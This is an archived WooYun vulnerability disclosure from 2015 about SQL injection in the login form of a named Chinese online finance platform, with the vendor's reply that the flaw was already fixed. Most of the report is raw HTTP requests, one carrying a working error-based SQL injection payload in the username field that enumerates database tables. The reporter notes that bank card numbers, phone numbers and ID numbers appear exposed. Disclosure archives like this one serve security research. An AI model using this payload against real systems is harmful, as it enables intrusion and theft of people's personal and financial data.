乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-29: 细节已通知厂商并且等待厂商处理中 2015-10-12: 厂商已经主动忽略漏洞,细节向公众公开
点点盈互联网金融服务(杭州)有限公司,是杭州科地资本集团有限公司旗下的互联网金融服务公司,开发、经营、管理点点盈【www.ddy98.com】互联网金融综合平台,公司高级管理团队及顾问由陈刚、黄晓捷、陈宇等资深的金融行业和互联网行业的专家组成。 作为专业的互联网金融平台,点点盈将以互联网券商为主要发展方向,致力于为公众提供包括互联网券商经纪业务、标准化金融产品互联网销售等互联网金融业务,结合多年的资产管理服务和风险控制经验,利用先进的信息处理技术,不断为投资者提供更安全、更丰富、更便捷的互联网金融产品。跟毛爷爷有关的事情不会不管吧。。
POST /index/signin HTTP/1.1Host: www.ddy98.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://www.ddy98.com/index/loginContent-Length: 84Cookie: Hm_lvt_c517ee8dbbab228796b220f53a8f8463=1441118424,1441154686; CNZZDATA1256207110=2039958451-1441117427-%7C1441160243; PHPSESSID=ol5jbebst3h2gaiqrbkpcic933; Hm_lpvt_c517ee8dbbab228796b220f53a8f8463=1441160341Connection: keep-alivePragma: no-cacheCache-Control: no-cacheusername=15656565656&passwd=vfdsbfds&ytoken=796bac1af7ed162b7c3df6ea8c8cc34060646203
username存在注入
POST /index/signin HTTP/1.1Host: www.ddy98.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://www.ddy98.com/index/loginContent-Length: 286Cookie: Hm_lvt_c517ee8dbbab228796b220f53a8f8463=1441118424,1441154686; CNZZDATA1256207110=2039958451-1441117427-%7C1441154494; PHPSESSID=ol5jbebst3h2gaiqrbkpcic933; Hm_lpvt_c517ee8dbbab228796b220f53a8f8463=1441154686Connection: keep-alivePragma: no-cacheCache-Control: no-cacheusername=1 union select exp(~(select*from(select group_concat(distinct table_name) from (select * from information_schema.columns group by table_name having table_schema=database() limit 1,40)a)x)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1#&passwd=ss&ytoken=8dc819e1e284f808185e2f3abc78d23c286b4b42
好像还有各种银行卡账号、用户手机号、身份证号。。没细看,就这样吧
过滤
危害等级:无影响厂商忽略
忽略时间:2015-10-12 19:26
漏洞Rank:4 (WooYun评价)
2015-10-13:此版本早已更新,目前已无上述漏洞,不过还是感谢提醒。请乌云网核实后关闭此信息